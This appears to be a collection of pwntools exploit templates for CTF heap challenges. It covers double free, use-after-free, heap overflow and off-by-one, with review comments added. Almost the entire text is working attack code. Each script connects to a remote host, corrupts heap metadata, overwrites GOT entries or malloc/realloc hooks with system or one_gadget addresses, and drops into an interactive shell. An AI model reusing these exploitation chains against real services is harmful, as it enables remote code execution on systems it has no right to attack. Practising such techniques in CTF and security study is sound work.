heap模板


double free

from pwn import *

# log_level='debug' makes pwntools echo every byte sent and received on the tube.
context(arch='i386', log_level='debug', os='linux')

#p = process('./heap_Double_Free')
# Remote challenge instance; the commented-out line above is the local-process
# variant of the same tube.
p=remote('123.60.135.228', 2056)

def fulltcache():
    """Allocate slots 0-6 with filler content, then release all seven in order.

    Uses the sibling malloc()/free() menu wrappers defined below. Seven is
    presumably chosen because it is glibc's default tcache per-bin count; the
    order (all allocations, then all releases) is what the flow below relies on.
    """
    for i in range(7):
        malloc(i, b'qwer')
    for i in range(7):
        free(i)

def malloc(id, contet):
    """Menu option 1: allocate slot ``id`` with the fixed size 100 holding ``contet``.

    ``id`` is sent as decimal text. No prompt is awaited before the size is
    sent, which is why a short sleep precedes it.
    """
    shell_prompt = 'root@ubuntu:~/Desktop$'
    p.recvuntil(shell_prompt)
    p.sendline(b'1')
    p.recvuntil('please input id and size :')
    p.sendline(str(id))
    sleep(0.1)
    p.sendline(b'100')
    p.recvuntil('please input contet:')
    p.sendline(contet)

def free(id):
    """Menu option 2: release slot ``id`` (sent as decimal text).

    Nothing here rejects an id that was already released.
    """
    shell_prompt = 'root@ubuntu:~/Desktop$'
    p.recvuntil(shell_prompt)
    p.sendline(b'2')
    p.recvuntil('please input id :')
    p.sendline(str(id))

def print(id):
    """Menu option 3: ask the target to display slot ``id``.

    NOTE(review): this shadows the builtin ``print`` for the rest of the script.
    Nothing in this listing calls the builtin afterwards, but a name such as
    ``show`` would avoid the surprise.
    """
    shell_prompt = 'root@ubuntu:~/Desktop$'
    p.recvuntil(shell_prompt)
    p.sendline(b'3')
    p.recvuntil('please input id :')
    p.sendline(str(id))


fulltcache()

malloc(1, b'qwer')
malloc(2, b'qwer')
malloc(3, b'qwer')


# Slot 1 is released twice with slot 2 released in between - the double free
# this template is named after. The wrappers carry no check against it, and
# evidently neither does the target.
free(1)
free(2)
free(1)

#attach(p)
# NOTE(review): 0x006010A0 and the value 257 written last are tied to this
# challenge binary (presumably a fixed, non-PIE address); they mean nothing
# elsewhere.
malloc(4,p64(0x006010A0))# the modifiable content sits 16 bytes past this address
malloc(5,b'qwer')
malloc(6,b'qwer')
malloc(7,p64(257))
p.interactive()

uaf

from pwn import *

# NOTE(review): arch='i386' is set, yet the script packs/unpacks 8-byte values
# (p64/u64 below, pointers of the form 0x7f...). p64/u64 are fixed-width so it
# still works, but the arch setting looks like a leftover.
context(arch='i386', log_level='debug', os='linux')
# Local copy of the challenge binary; elf.got is read further down.
elf=ELF("./pwn")


def malloc(size, contet):
    """Menu option 1: request ``size`` bytes and fill them with ``contet``.

    The size goes out as decimal text plus newline; the content is sent raw
    (no trailing newline).
    """
    menu_marker = "5. exit"
    arrow = "--->"
    p.recvuntil(menu_marker)
    p.sendline(b'1')
    p.recvuntil(arrow)
    p.sendline(str(size))
    p.recvuntil(arrow)
    p.send(contet)
def free(id):
    """Menu option 3: release slot ``id`` (sent as decimal text)."""
    menu_marker = "5. exit"
    p.recvuntil(menu_marker)
    p.sendline(b'3')
    p.recvuntil("--->")
    p.sendline(str(id))

def edit(id,size,contet):
    """Menu option 2: rewrite slot ``id``, sending ``size`` then ``contet``.

    id and size go out as decimal text with newlines; the content is sent raw.
    """
    menu_marker = "5. exit"
    arrow = "--->"
    p.recvuntil(menu_marker)
    p.sendline(b'2')
    for field in (str(id), str(size)):
        p.recvuntil(arrow)
        p.sendline(field)
    p.recvuntil(arrow)
    p.send(contet)

def show(id):
    """Menu option 4: ask the target to display slot ``id``."""
    menu_marker = "5. exit"
    p.recvuntil(menu_marker)
    p.sendline(b'4')
    p.recvuntil("--->")
    p.sendline(str(id))


# p = process('./pwn')
p = remote('node4.buuoj.cn', 26517)
# libc build shipped with the challenge; every libc offset below comes from it.
libc = ELF('libc-2.23.so')
malloc(0x80, b'qwer')
malloc(0x80, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'qwer')
malloc(0x68, b'/bin/sh')

# Slot 0 is released and then displayed anyway (the UAF this template is named
# after); the bytes printed back are used as the libc leak.
free(0)
show(0)
p.recvuntil(":")
# recv(7)[1:] keeps 6 bytes, zero-extended to a u64. The two large constants
# were copied from one debug session and reduce to a single build-specific
# delta: 0x7fef613c4b78 - 0x7fef61000000 = 0x3c4b78.
libc_base = u64(p.recv(7)[1:] + b'\0' * 2) - 0x7fef613c4b78 + 0x7fef61000000
system = libc_base + libc.sym["system"]
free_got = elf.got['free']
# pause()
# Slot 2 is released twice with slot 3 in between.
free(2)
free(3)
free(2)
# NOTE(review): 0x6020C0 and the 0x23 adjustment are tied to this challenge
# binary; they are not general values.
malloc(0x68, p64(0x0000000006020C0 - 0x23))
malloc(0x68, 'ase')
malloc(0x68, 'ase')
print(hex(libc_base))
print(hex(free_got))
malloc(0x68, b'a' * (0x23 - 0x10) + p64(free_got))
# attach(p)
edit(0, 10, p64(system))
# Same as free(4) through the wrapper: menu option 3, then id 4.
p.sendlineafter("5. exit", b'3')
p.sendlineafter("--->", b'4')
p.interactive()

2.27uaf

from struct import pack
# NOTE(review): this listing uses context, remote, ELF, gdb, pause, u64 and p64,
# but no `from pwn import *` appears above it - only `from struct import pack`,
# which is never used. The pwn import was presumably dropped in the paste.
context.log_level='debug'
context(os = 'linux', arch = 'amd64')

#p = process('./pwn')
p = remote('43.142.108.3', 28585)
# Loaded but not referenced anywhere else in this listing.
elf = ELF('./pwn')
#libc = ELF('buu/libc-2.27-x64.so')
#libc = ELF('glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
# The libc used for symbol lookups; the commented lines are other candidate
# copies of a 2.27 build.
libc = ELF('libc-2.27.so')

def debug():
    """Attach gdb to the tube and block until the user continues.

    Meaningful only when ``p`` is a local process(); never called in this
    listing.
    """
    gdb.attach(p)
    pause()
def add(size, name, content):
    """Menu option 1: create an entry of ``size`` with the given ``name`` and ``content``.

    The size goes out as decimal text plus newline; name and content are sent
    raw (no trailing newline).
    """
    choice_prompt = b'Choice: \n'
    p.recvuntil(choice_prompt)
    p.sendline('1')
    p.recvuntil(b'Size:\n')
    p.sendline(str(size))
    p.recvuntil(b'Name: \n')
    p.send(name)
    p.recvuntil(b'Content:\n')
    p.send(content)
def free(index):
    """Menu option 2: release entry ``index`` (sent as decimal text)."""
    choice_prompt = b'Choice: \n'
    p.recvuntil(choice_prompt)
    p.sendline('2')
    p.recvuntil(b'idx:\n')
    p.sendline(str(index))
def show(index):
    """Menu option 3: ask the target to display entry ``index``."""
    choice_prompt = b'Choice: \n'
    p.recvuntil(choice_prompt)
    p.sendline('3')
    p.recvuntil(b'idx:\n')
    p.sendline(str(index))
def edit(index, content):
    """Menu option 4: overwrite entry ``index`` with ``content``.

    No prompt is awaited before the content; it is sent raw right after the
    index.
    """
    choice_prompt = b'Choice: \n'
    p.recvuntil(choice_prompt)
    p.sendline('4')
    p.recvuntil(b'idx:\n')
    p.sendline(str(index))
    p.send(content)
# leak libcbase
add(0x410, b'1', b'a') #index 0
add(0x20, b'1', b'a') #index 1
add(0x10, b'1', b'a') #index 2
# Index 0 is released and then shown (the UAF this template is named after).
free(0)
show(0)
# The six bytes ending in the 0x7f byte are zero-extended to a u64; 96 + 0x10
# and the __malloc_hook symbol offset are then subtracted. These numbers are
# tied to the 2.27 build loaded above.
libcbase = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
print(' libcbase -> ', hex(libcbase))

# malloc_hook -> one_gadget
# NOTE(review): 0x10a2fc is an offset into this specific libc-2.27.so file;
# it is not valid for any other build.
one_gadget = libcbase + 0x10a2fc
malloc_hook = libcbase + libc.sym['__malloc_hook']
# Index 1 is released and then edited (UAF again) before two more allocations.
free(1)
edit(1, p64(malloc_hook))
add(0x10, b'1', b'a') #index 3
add(0x20, b'1', b'a') #index 4
edit(4, p64(one_gadget))

# pwn
# One more allocation request, sent by hand rather than through add().
p.sendlineafter(b'Choice: \n', '1')
p.sendlineafter(b'Size:\n', b'10')
p.interactive()

堆溢出

from pwn import *

def connetc():
    """Open the tube and load the ELF and libc objects into the module globals p, elf, libc.

    NOTE(review): the name is a typo for "connect", but the driver loop at the
    bottom calls it by this name, so it is left as is. The libc is taken from
    the local system (/lib/x86_64-linux-gnu/libc.so.6), so every hard-coded
    libc offset used later (0x3c4b78, the ``one`` list) only holds if that file
    matches the target's build.
    """
    global p,elf,libc
    p=remote('192.168.109.168',10000)
    #p=process('./Emo_Chunk')
    elf=ELF('./Emo_Chunk')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'
def add(size):
    """Menu option 1: allocate a chunk of ``size`` bytes (size sent as decimal text)."""
    choice_prompt = "Please Choice!"
    p.recvuntil(choice_prompt)
    p.sendline('1')
    p.recvuntil("Please Input Size:")
    p.sendline(str(size))

def dele(index):
    """Menu option 2: release chunk ``index`` (sent as decimal text)."""
    choice_prompt = "Please Choice!"
    p.recvuntil(choice_prompt)
    p.sendline('2')
    p.recvuntil("Please Input index:")
    p.sendline(str(index))

def show(index):
    """Menu option 4: ask the target to display chunk ``index``."""
    choice_prompt = "Please Choice!"
    p.recvuntil(choice_prompt)
    p.sendline('4')
    p.recvuntil("Please Input index:")
    p.sendline(str(index))
def edit(index,content):
    """Menu option 3: overwrite chunk ``index`` with ``content`` plus a newline."""
    choice_prompt = "Please Choice!"
    p.recvuntil(choice_prompt)
    p.sendline('3')
    p.recvuntil("Please Input index:")
    p.sendline(str(index))
    p.recvuntil("Change EMo Content")
    p.sendline(content)
def pwn(i,j):
    """Run one attempt of the heap-overflow flow for candidate pair ``i``/``j``.

    ``i`` indexes the ``one`` offset list and ``j`` is added to the realloc
    address; the driver loop at the bottom of the file tries combinations.

    NOTE(review): this body is written for Python 2. On Python 3 the str + bytes
    concatenations ('a'*0x68 + p64(0x71) ...) and the bytes.ljust call with a
    str fill value raise TypeError.
    """
    add(0x68)#0
    add(0x68)#1
    add(0x68)#2
    add(0x68)#3
    add(0x68)#4
    add(0x68)#5

    # 0x68 bytes of filler plus 8 more bytes go into a 0x68-byte chunk, i.e.
    # past its requested size (the heap overflow this template is named after).
    edit(0,'a'*0x68 + '\xe1' + '\x00'*7)

    dele(1)
    add(0x68)
    show(2)
    p.recvuntil('\n')

    # Six leaked bytes, zero-extended; 0x3c4b78 is a build-specific delta to
    # the libc base (see connetc() for which libc file is assumed).
    addr = u64(p.recv(6).ljust(8,'\x00'))
    print("addr : " + hex(addr-0x3c4b78))

    libc_addr = addr - 0x3c4b78
    dele(4)
    edit(3,'a'*0x68 + p64(0x71) + p64(libc_addr+libc.symbols['__malloc_hook']-0x23))
    print(hex(libc_addr+libc.symbols['__malloc_hook']-0x23))

    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    log.info("realloc_hook:"+hex(realloc_hook))
    realloc = libc_addr + libc.sym['realloc']
    log.info("realloc:"+hex(realloc))

    add(0x68) #4

    add(0x68) #6
    # Candidate offsets into the libc selected in connetc(); presumably
    # one_gadget results (compare the one_gadget variable in the 2.27 listing
    # above) - confirm against the libc actually loaded.
    one = [0x45226,0x4527a,0xf03a4,0xf1247]
    edit(6,cyclic(11)+p64(libc_addr+one[i]) + p64(realloc + j))
    add(0x30)

    p.interactive()
# Driver: one fresh connection per (i, j) candidate pair.
for i in range(4):
    for j in [0,2,4,6,8,10,13,16,20]:
        try:
            print("i :",i)
            print("j :",j)
            connetc()
            pwn(i,int(j))  # int() is a no-op here; j is already an int
            p.close()
        # NOTE(review): a bare except also swallows KeyboardInterrupt and
        # SystemExit, so Ctrl-C does not stop the loop; and if connetc() fails
        # before binding p on the very first iteration, p.close() in the
        # handler raises NameError instead of continuing.
        except :
            print("...")
            p.close()

off_by_one

from pwn import *
from LibcSearcher import *
# Echo every byte on the tube; arch='amd64' selects the 64-bit word size for
# the pwntools helpers that depend on it (p64/u64 used here are fixed-width
# regardless).
context.log_level='debug'
context.arch='amd64'

def add(size,contet):
    """Menu option 1: create a heap entry of ``size`` holding ``contet``.

    Every field here is sent raw (sendafter, no trailing newline), including
    the menu choice and the decimal size.
    """
    choice_prompt = "Your choice :"
    p.recvuntil(choice_prompt)
    p.send(b'1')
    p.recvuntil("Size of Heap :")
    p.send(str(size))
    p.recvuntil("Content of heap:")
    p.send(contet)

def edit(index,contet):
    """Menu option 2: overwrite entry ``index`` with ``contet``.

    All fields are sent raw (no trailing newline). Note the prompt string
    differs from add()'s by a space before the colon.
    """
    choice_prompt = "Your choice :"
    p.recvuntil(choice_prompt)
    p.send(b'2')
    p.recvuntil("Index :")
    p.send(str(index))
    p.recvuntil("Content of heap :")
    p.send(contet)

def show(index):
    """Menu option 3: ask the target to display entry ``index`` (fields sent raw)."""
    choice_prompt = "Your choice :"
    p.recvuntil(choice_prompt)
    p.send(b'3')
    p.recvuntil("Index :")
    p.send(str(index))

def dele(index):
    """Menu option 4: release entry ``index``.

    Unlike the other wrappers in this listing, the index is sent with a
    trailing newline (sendlineafter); presumably intentional for this binary.
    """
    choice_prompt = "Your choice :"
    p.recvuntil(choice_prompt)
    p.send(b'4')
    p.recvuntil("Index :")
    p.sendline(str(index))

# p= process("./heapcreator")
p=remote("node4.buuoj.cn",27274)
add(0x18,b'a')
add(0x10,b'b')
add(0x10,b'c')
add(0x10,b'/bin/sh')
# 0x18 bytes fill entry 0 exactly; the 0x81 is the single extra byte (the
# off-by-one this template is named after).
edit(0,b'a'*0x18+b'\x81')
dele(1)
add(0x70,b'a')
# NOTE(review): 0x602018 is a fixed address in this challenge binary; given the
# variable name below and the LibcSearcher lookup of "free", it is presumably
# free's GOT entry - confirm against the binary.
edit(1,0x10*b'b'+p64(0)+p64(0x21)+p64(0x40)+p64(0x000000000602018))
# attach(p)
show(1)
# Six leaked bytes ending in 0x7f, zero-extended to 8. The local name `free`
# is the leaked address, not a wrapper - this listing defines no free() helper.
free=p.recvuntil("\x7f")[-6:]+b'\0'*2
free = u64(free)
print(hex(free))
# LibcSearcher (third-party) presumably matches a libc build from the leaked
# free address; dump() then returns symbol offsets for that build.
libc=LibcSearcher("free",free)
system=libc.dump("system")
print(libc)
#attach(p)
edit(1,p64(system+free-libc.dump("free")))
dele(3)
p.interactive()